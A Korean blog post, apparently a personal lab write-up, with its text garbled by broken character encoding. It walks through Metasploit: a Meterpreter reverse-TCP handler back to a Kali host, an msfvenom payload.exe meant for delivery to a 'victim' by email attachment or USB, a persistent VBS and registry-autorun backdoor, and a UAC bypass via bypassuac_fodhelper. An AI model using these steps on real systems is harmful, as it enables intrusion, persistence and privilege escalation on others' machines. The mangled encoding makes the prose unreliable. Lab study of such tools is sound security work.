์ผ๋‹จ ํ•˜๊ณ  ๋ณด๋Š” ์‚ฌ๋žŒ

๋‚˜์ค‘๋ณด๋‹จ ์ง€๊ธˆ์— ์ง‘์ค‘ํ•˜๋˜, ์ง€๊ธˆ๋ณด๋‹จ ๋‚˜์ค‘์— ์™„๋ฒฝํ•ด์ง€์ž๐Ÿ’ช๐Ÿป

๐Ÿง Linux ์•Œ๊ณ  ์“ฐ์ž

[MSF]๋ฉ”ํƒ€์Šคํ”Œ๋กœ์ž‡ ํ™˜๊ฒฝ์—์„œ C2 ์„œ๋ฒ„์™€ ํด๋ผ์ด์–ธํŠธ ์„œ๋ฒ„ ๊ตฌ์ถ•ํ•˜๊ธฐ

JanginTech 2024. 10. 17. 16:13

๋ฉ”ํƒ€์Šคํ”Œ๋กœ์ž‡ ์‹œ์ž‘ ๋ช…๋ น์–ด msfconsole์„ ์‹คํ–‰ํ•˜๋ฉด ์œ„์™€ ๊ฐ™์€ ํ™”๋ฉด์ด ๋œจ๋ฉด ์ •์ƒ์ ์œผ๋กœ ์‹คํ–‰ํ•œ ๊ฑฐ๋‹ค.

 

 

 

์ต์Šคํ”Œ๋กœ์ž‡ ํ•ธ๋“ค๋Ÿฌ ์„ค์ •ํ•˜๊ธฐ.

ํ”ผํ•ด์ž ์‹œ์Šคํ…œ์˜ ์—ฐ๊ฒฐ์„ ์ˆ˜์‹ ํ•˜๋ ค๋ฉด ์ต์Šคํ”Œ๋กœ์ž‡ ํ•ธ๋“ค๋Ÿฌ๋ฅผ ์„ค์ •ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์—ญ๋ฐฉํ–ฅ TCP ํŽ˜์ด๋กœ๋“œ๋ฅผ ์‚ฌ์šฉํ•  ์˜ˆ์ •!

 

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.86.130
set LPORT 4444

 

Windows์šฉ ํŽ˜์ด๋กœ๋“œ๋ฅผ ๋งŒ๋“ค ์˜ˆ์ •์ด๋‹ค. (Meterpreter๋ฅผ ์‚ฌ์šฉํ•ด์„œ!)

์ด ํŽ˜์ด๋กœ๋“œ๋Š” ํ”ผํ•ด์ž์˜ ์ปดํ“จํ„ฐ์—์„œ ์‹คํ–‰๋˜๋ฉด C2 ์„œ๋ฒ„์— ๋‹ค์‹œ ์—ฐ๊ฒฐ๋˜๋„๋ก ํ•ด์ค€๋‹ค.

C2 ์„œ๋ฒ„์˜ ์ˆ˜์‹  ์ฃผ์†Œ๋ฅผ ๊ตฌ์„ฑํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” LHOST, LPORT ์„ค์ •์ด ํ•„์š”ํ•˜๋‹ค.

LHOST๋Š” Kali ๋จธ์‹  IP ์ฃผ์†Œ๋กœ ์ง€์ •ํ•ด์ฃผ์—ˆ๊ณ , LPORT๋Š” ๋‚˜์ค‘์— ๋ณ€๊ฒฝ๊ฐ€๋Šฅํ•˜๋‹ค๊ธธ๋ž˜ ์ผ๋‹จ ์ˆ˜์‹  ํฌํŠธ 4444(default)๋กœ ํ•ด์ฃผ์—ˆ๋‹ค.

 

๊ทธ ํ›„ ํ•ธ๋“œ๋Ÿฌ๋ฅผ ์‹คํ–‰ํ•ด์ฃผ์—ˆ๋‹ค. exploit -j

ํŽ˜์ด๋กœ๋“œ ๋ฐ ์ˆ˜์‹  ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์„ค์ • ํ›„์— ํ•ธ๋“ค๋Ÿฌ๋ฅผ ์‹œ์ž‘ํ•˜์—ฌ ๋“ค์–ด์˜ค๋Š” ์—ฐ๊ฒฐ์„ ์ˆ˜์‹ ํ•  ์ˆ˜ ์žˆ๋‹ค.

๊ทธ๋Ÿฌ๋ฉด ๋ฐฑ๊ทธ๋ผ์šด๋“œ์—์„œ ์ต์Šคํ”Œ๋กœ์ž‡ ํ•ธ๋“ค๋Ÿฌ๊ฐ€ ์‹คํ–‰๋˜์–ด ํ”ผํ•ด์ž๊ฐ€ ์—ฐ๊ฒฐ๋  ๋•Œ๊นŒ์ง€ ๊ธฐ๋‹ค๋ฆฐ๋‹ค.

 

 

 

 

2. ํ”ผํ•ด์ž๋ฅผ ์œ„ํ•œ(?) ํŽ˜์ด๋กœ๋“œ ์ƒ์„ฑ

์ด์ œ ํ”ผํ•ด์ž ์ธก์—์„œ ์„ค์ •์„ ํ•ด์ฃผ์–ด์•ผ ํ•œ๋‹ค.

MSFVenom์„ ์‚ฌ์šฉํ•˜์—ฌ ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ƒ์„ฑํ•ด๋ณด๊ฒ ๋‹ค.

Windows ์‹œ์Šคํ…œ์—์„œ ์‹คํ–‰๋  ๋•Œ C2 ์„œ๋ฒ„์— ๋‹ค์‹œ ์—ฐ๊ฒฐํ•˜๋Š” ์•…์„ฑ ์‹คํ–‰ ํŒŒ์ผ์„ ์ƒ์„ฑํ•˜๊ฒŒ ๋œ๋‹ค.

 

LHOST = Kali Linux ๋จธ์‹  IP ์ฃผ์†Œ

LPORT = ์‹œ์Šคํ…œ์ด ์ˆ˜์‹  ๋Œ€๊ธฐ ์ค‘์ธ ํฌํŠธ

-f exe = Windows ์‹คํ–‰ ํŒŒ์ผ์„ ์ง€์ •

-o payload.exe = ์ถœ๋ ฅ ํŒŒ์ผ ์ด๋ฆ„์„ payload.exe๋กœ ์ง€์ •

 

ํŽ˜์ด๋กœ๋“œ(payload.exe)๋ฅผ ํ”ผํ•ด์ž์˜ ์ปดํ“จํ„ฐ์— ์ „๋‹ฌํ•ด์•ผ ํ•œ๋‹ค. ์ด ์ „๋‹ฌ์€ ์ด๋ฉ”์ผ ์ฒจ๋ถ€ ํŒŒ์ผ, USB, URL ๋“ฑ๋“ฑ์˜ ๋ฐฉ์‹์„ ํ†ตํ•ด ์ˆ˜ํ–‰๋  ์ˆ˜ ์žˆ๋‹ค.

ํ”ผํ•ด์ž๊ฐ€ payload.exe๋ฅผ ์‹คํ–‰ํ•˜๋ฉด Kali Linux์˜ C2 ์„œ๋ฒ„์— ๋‹ค์‹œ ์—ฐ๊ฒฐ์„ ์‹œ๋„ํ•œ๋‹ค.

 

 

์šฐ์˜คใ…22

 

์šฐ์™€ ์‹ ๊ธฐํ•˜๋‹ค!!

 

 

 

๋‚ด์นœ๊น€์— ๋ฐฑ๋„์–ด๋„ ํ•ด๋ณด์ž.

๋ฐฑ๋„์–ด๋ฅผ ๋งŒ๋“ค๊ธฐ ์œ„ํ•ด์„œ๋Š” ์„ธ์…˜ ์•„์ด๋””๋ฅผ ์•Œ์•„์•ผํ•œ๋‹ค.

 

 

 

์ž์ถ•!!!~~

exploit/windows/local/persistence ๋ชจ๋“ˆ์„ ์‚ฌ์šฉํ•˜์—ฌ ์˜๊ตฌ ๋ฐฑ๋„์–ด๋ฅผ ์„ฑ๊ณต์ ์œผ๋กœ ์„ค์ •ํ–ˆ๋‹ค

 

VBS ์Šคํฌ๋ฆฝํŠธ ์ƒ์„ฑ๋จ: VBS(Visual Basic Script) ํŒŒ์ผ์ด Windows ๋Œ€์ƒ C:\Users\victim\AppData\Local\Temp\ ๋””๋ ‰ํ„ฐ๋ฆฌ์— ํŒŒ์ผ ์ด๋ฆ„ RoTRQVJ.vbs๋กœ ๊ธฐ๋ก๋˜์—ˆ์œผ๋ฉฐ, ์ด ์Šคํฌ๋ฆฝํŠธ๋Š” ์‚ฌ์šฉ์ž ๋กœ๊ทธ์ธ ์‹œ ์ž๋™์œผ๋กœ ์‹คํ–‰๋˜๋Š” ๋ฐฑ๋„์–ด๋‹ค๋‹ค

 

 

์•„๊นŒ๋„ ๋งํ–ˆ๋“ฏ์ด RoTRQVJ.vbs๋ผ๋Š” ์ด๋ฆ„์˜ VBS ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์ƒ์„ฑ๋˜์—ˆ๋‹ค(Visual Basic Script)

์ด ์Šคํฌ๋ฆฝํŠธ๋Š” ์‚ฌ์šฉ์ž ๋กœ๊ทธ์ธ ์‹œ ์ž๋™์œผ๋กœ ์‹คํ–‰๋˜๋Š” ๋ฐฑ๋„์–ด๋‹ค!!

 

๊ทธ๋ฆฌ๊ณ  Windows ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ž๋™ ์‹คํ–‰ ํ•ญ๋ชฉ์ด ์ƒ์„ฑ๋˜์—ˆ๋‹ค.(๋ฐ‘์ค„๋ถ€๋ถ„)

์ด๊ฑธ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค๋ผ๊ณ  ๋ถ€๋ฅด๋Š”๋ฐ ์ด๊ฑด ํ”ผํ•ด์ž๊ฐ€ Window ๋กœ๊ทธ์ธํ•  ๋•Œ๋งˆ๋‹ค VBS ๋ฐฑ๋„์–ด ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์‹คํ–‰๋˜์–ด ์ง€์†์„ฑ์„ ์œ ์ง€ํ•˜๋„๋ก ๋ณด์žฅํ•˜๋Š” ๊ฑฐ๋‹ค!(SYSTEM, USER ๋ฒ„์ „์ค‘ ๋‚œ USER๊ณจ๋ผ์„œ ์ด๋ ‡๊ฒŒ ๋จ์—ฌ)

 

RC ํŒŒ์ผ ์ƒ์„ฑ๋จ: Meterpreter ๋ฆฌ์†Œ์Šค(RC) ํŒŒ์ผ๋„ ์ƒ์„ฑ๋จ. ์ด RC ํŒŒ์ผ์—๋Š” Metasploit์ด ๋‚˜์ค‘์— ์„ธ์…˜์„ ๋‹ค์‹œ ์„ค์ •ํ•˜๊ธฐ ์œ„ํ•ด ์ž๋™์œผ๋กœ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ๋ช…๋ น์ด ํฌํ•จ๋˜์–ด์žˆ์œผ๋ฉฐ RC ํŒŒ์ผ์€ ๋‹ค์Œ ์œ„์น˜์— ์ €์žฅ๋œ๋‹ค.

/root/.msf4/logs/persistence/DESKTOP-F1V9586_20241013.2838

 

 

๋‚ด๊ฐ€ ๋งŒ๋“  ๋ฐฑ๋„์–ด. ์“ฐ๋Š” ๋ฐฉ๋ฒ•๋„ ์•Œ์•„์•ผ๊ฒ ์ง€?

1. use exploit/multi/handler

2.set PAYLOAD windows/meterpreter/reverse_tcp

๋ฐฑ๋„์–ด๋ฅผ ์ƒ์„ฑํ•  ๋•Œ ์‚ฌ์šฉ๋œ ๊ฒƒ๊ณผ ์ผ์น˜ํ•˜๋„๋ก ํŽ˜์ด๋กœ๋“œ๋ฅผ ์„ค์ •

3.set LHOST 192.168.86.130  # (your attacking machine's IP) ๋ฐฑ๋„์–ด๊ฐ€ ๋‹ค์‹œ ์—ฐ๊ฒฐํ•  LHOST ๋ฐ LPORT(IP ์ฃผ์†Œ ๋ฐ ํฌํŠธ)๋ฅผ ์ง€์ •ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๋ฐฑ๋„์–ด๋ฅผ ์ƒ์„ฑํ•  ๋•Œ ์‚ฌ์šฉํ•œ ์„ค์ •๊ณผ ์ผ์น˜ํ•ด์•ผ ํ•จ!!
set LPORT 4444            # (the port you configured for the backdoor) 

4.exploit -j  ๋“ค๋Ÿฌ๋ฅผ ์‹œ์ž‘ํ•˜์—ฌ ๋“ค์–ด์˜ค๋Š” ์—ฐ๊ฒฐ์„ ์ˆ˜์‹ 

 ํ”ผํ•ด์ž๊ฐ€ ๋กœ๊ทธ์ธํ•˜์—ฌ ๋ฐฑ๋„์–ด๋ฅผ ์‹คํ–‰ํ•  ๋•Œ๊นŒ์ง€ ๋Œ€๊ธฐ

5.sessions -l ํ™œ์„ฑ ์„ธ์…˜์ด ๋‚˜์—ด๋˜์–ด ์žˆ์œผ๋ฉด ๋ฐฑ๋„์–ด๊ฐ€ ๋ฆฌ์Šค๋„ˆ์— ์„ฑ๊ณต์ ์œผ๋กœ ์—ฐ๊ฒฐ๋˜์—ˆ์Œ์„ ์˜๋ฏธ

6. sessions -i <session_id>

 

์„ธ์…˜๊ณผ ์ƒํ˜ธ์ž‘์šฉ

์ƒ์„ฑ ์™„

 

์ ‘๊ทผ ๊ถŒํ•œ์ด ๋‚ฎ์€ ์‚ฌ์šฉ์ž๋กœ ์ ‘๊ทผ์ด ๊ฐ€๋Šฅํ•œ์ง€ ํ…Œ์ŠคํŠธ ํ•ด๋ณด์ž.

์•ก์„ธ์Šค ๊ฑฐ๋ถ€ ํ™•์ธ

 

 

๊ถŒํ•œ์ƒ์Šน์ „์—๋Š” ์•„๋ž˜์™€ ๊ฐ™์Œ

 

๊ถŒํ•œ ์ƒ์Šน์„ ํ•ด์•ผ ๋จ

 

์ด ์‹œ๋‚˜๋ฆฌ์˜ค์—์„œ๋Š” ๊ถŒํ•œ ์ƒ์Šน์„ ํ†ตํ•ด ๋ฃจํŠธ ๊ถŒํ•œ์„ ํš๋“ํ•ด์•ผ๋งŒ secret.txt ํŒŒ์ผ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.

 

๊ถŒํ•œ ์ƒ์Šน์„ ์œ„ํ•œ ๋‹จ๊ณ„

0. local_exploit_suggester ? 

๋จผ์ € ์‹œ์Šคํ…œ์—์„œ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ๊ถŒํ•œ ์ƒ์Šน ์ทจ์•ฝ์ (Local ์ทจ์•ฝ์ ) ์„ ์ฐพ์•„์•ผ ํ•œ๋‹ค.

Meterpreter Shell์—์„œ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ๋ชจ๋“ˆ ์ค‘ ์ด๋Ÿฌํ•œ ๊ณผ์ •์„ ์ž๋™ํ™”ํ•œ ๋ชจ๋“ˆ, local_exploit_suggester๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ๋œ๋‹ค.

local_exploit_suggester์„ ํ†ตํ•ด ๋กœ์ปฌ ์‹œ์Šคํ…œ ์ทจ์•ฝ์ ์„ ์‰ฝ๊ฒŒ ์ฐพ์„ ์ˆ˜ ์žˆ๊ณ  post ๋ชจ๋“ˆ ์ค‘ recon์— ํ•ด๋‹นํ•œ๋‹ค.

 

1. ๋ฐฑ๊ทธ๋ผ์šด๋“œ๋กœ ๋ณด๋‚ด๊ธฐ

ํ˜„์žฌ ๋‚˜๋Š” meterpreter ์ฝ˜์†”์— ๋จธ๋ฌผ๋Ÿฌ์žˆ๋‹ค.

 

์—ฌ๊ธฐ์„œ ์ฃผ์˜ํ•ด์•ผ ํ•  ์ ์€ local_exploit_suggester๋Š” Meterpreter ์ฝ˜์†”์—์„œ ์‚ฌ์šฉ๋˜๋Š” ๋ชจ๋“ˆ์ผ๋ฟ์ด์ง€ Meterpreter ์„ธ์…˜ ๋‚ด์—์„œ ์“ธ ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ˆ์ด ์•„๋‹ˆ๋ผ๋Š” ์ ์ด๋‹ค!

๊ทธ๋ž˜์„œ Meterpreter์—์„œ ์ง์ ‘ ๋กœ๋“œํ•˜๋Š” ๊ฒŒ ์•„๋‹ˆ๋ผ Metasploit ์ฝ˜์†”์—์„œ ์‚ฌ์šฉํ•ด์•ผ ํ•œ๋‹ค. (์–ด์ฉ์ง€ Tabํ‚ค๊ฐ€ ์•ˆ๋จน๋”๋ผ ใ… ใ… )

 

Meterpreter ์„ธ์…˜์„ ๋ฐฑ๊ทธ๋ผ์šด๋“œ๋กœ ๋ณด๋‚ด์„œ ์‚ฌ์šฉํ•˜๋ฉด ๋œ๋‹ค.

 

2. use post/multi/recon/local_exploit_suggester

use post/multi/recon/local_exploit_suggester

 

 

1

local_exploit_suggester๋Š” ๋Œ€์ƒ ์‹œ์Šคํ…œ์— ๋Œ€ํ•ด ์ด 196๊ฐœ์˜ ๊ฒ€์‚ฌ๋ฅผ ์‹คํ–‰ํ•˜๊ณ  ์ž ์žฌ์  ์ทจ์•ฝ์  ํ•˜๋‚˜ ' exploit/windows/local/bypassuac_fodhelper '๋ฅผ ์‹๋ณ„ํ•ด๋ƒˆ๋‹ค.

 

exploit/windows/local/bypassuac_fodhelper๋Š” ๋Œ€์ƒ์ด UAC ์šฐํšŒ์— ์ทจ์•ฝํ•œ ๊ฒƒ์œผ๋กœ ๋‚˜ํƒ€๋‚จ์„ ์˜๋ฏธํ•œ๋‹ค. ์ด๋ฅผ ํ†ตํ•ด UAC ํ”„๋กฌํ”„ํŠธ๋ฅผ ํŠธ๋ฆฌ๊ฑฐํ•˜์ง€ ์•Š๊ณ ๋„ ์ƒ์Šน๋œ ๊ถŒํ•œ์œผ๋กœ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋œ๋‹ค.

 

์ฐพ์€ ์ต์Šคํ”Œ๋กœ์ž‡์„ ์‚ฌ์šฉํ•ด๋ณด์ž.

์ด ์ทจ์•ฝ์ ๊ณผ ๊ฐ€์žฅ ๊ด€๋ จ ๊นŠ์€ ์ต์Šคํ”Œ๋กœ์ž‡์€ bypassuac_fodhelper๋‹ค.

์ด ๋ชจ๋“ˆ์„ ๋กœ๋“œํ•˜์—ฌ ์‹คํ–‰ํ•ด๋ณด์ž.

 

bypassuac_fodhelper ์‹คํ–‰ํ•˜๊ธฐ

use exploit/windows/local/bypassuac_fodhelper

ํ•ด๋‹นํ•˜๋Š” ์„ธ์…˜ ์•„์ด๋””๊ฐ€ 1์—ฌ์„œ 1๋กœ ๋ฐ”๋กœ ์ง€์ •

 

 

 

 

 

chcp 65001

์ถ”๊ฐ€๋กœ ์นผ๋ฆฌ์ธก ํ•œ๊ธ€ ์„ค์ •(์œˆ๋„์šฐ๋Š” ๋”ฐ๋กœํ•ด์ค˜์•ผํ•จ ์ด๊ฑฐ๊นจ์ง€๋Š”๊ฑฐ์ฉ”์ˆ˜์—†์Œ ๋‚œ๋…ํ™”์•„๋‹˜)

 

์—๋Ÿฌ